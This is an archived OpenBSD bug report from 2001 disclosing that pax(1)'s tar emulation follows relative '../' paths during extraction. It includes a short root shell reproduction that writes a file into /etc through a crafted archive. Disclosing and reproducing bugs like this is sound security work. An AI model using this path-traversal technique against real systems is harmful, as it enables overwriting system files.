[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

user/2177: tar emulation from pax(1) vulnerable to relative paths problem

To: gnats@openbsd.org
Subject: user/2177: tar emulation from pax(1) vulnerable to relative paths problem
From: venglin@komnata.komnata.pl
Date: 13 Nov 2001 21:04:57 -0000
Resent-Date: Wed, 14 Nov 2001 06:00:03 -0700 (MST)
Resent-From: gnats@cvs.openbsd.org (GNATS Management)
Resent-Message-Id: <200111141300.fAED031v014654@cvs.openbsd.org>
Resent-Reply-To: gnats@cvs.openbsd.org, venglin@komnata.komnata.pl
Resent-To: bugs@cvs.openbsd.org


>Number:         2177
>Category:       user
>Synopsis:       tar emulation from pax(1) vulnerable to relative paths problem
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Nov 14 06:00:02 MST 2001
>Last-Modified:
>Originator:     Przemysław Frasunek
>Organization:
net
>Release:        any
>Environment:
	System      : OpenBSD 2.9
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:

pax(1) allows to overwrite any file in system, when unpacking malicious
archive, containing relative paths.

This problem can expose security risk in mail anti-virus scanners.

>How-To-Repeat:

riget:root:/tmp# touch /etc/test
riget:root:/tmp# tar -cf test.tar ../../../../../../etc/test
riget:root:/tmp# rm /etc/test
riget:root:/tmp# tar -xf test.tar
riget:root:/tmp# ls -la /etc/test
-rw-r--r--  1 root  wheel  0 12 Lis 13:43 /etc/test

>Fix:

Unknown.

>Audit-Trail:
>Unformatted:

Prev by Date: Re: documentation/2176
Next by Date: system/2178: rwhod sends errors to stderr after calling daemon
Prev by thread: Re: documentation/2176
Next by thread: system/2178: rwhod sends errors to stderr after calling daemon
Index(es):
- Date
- Thread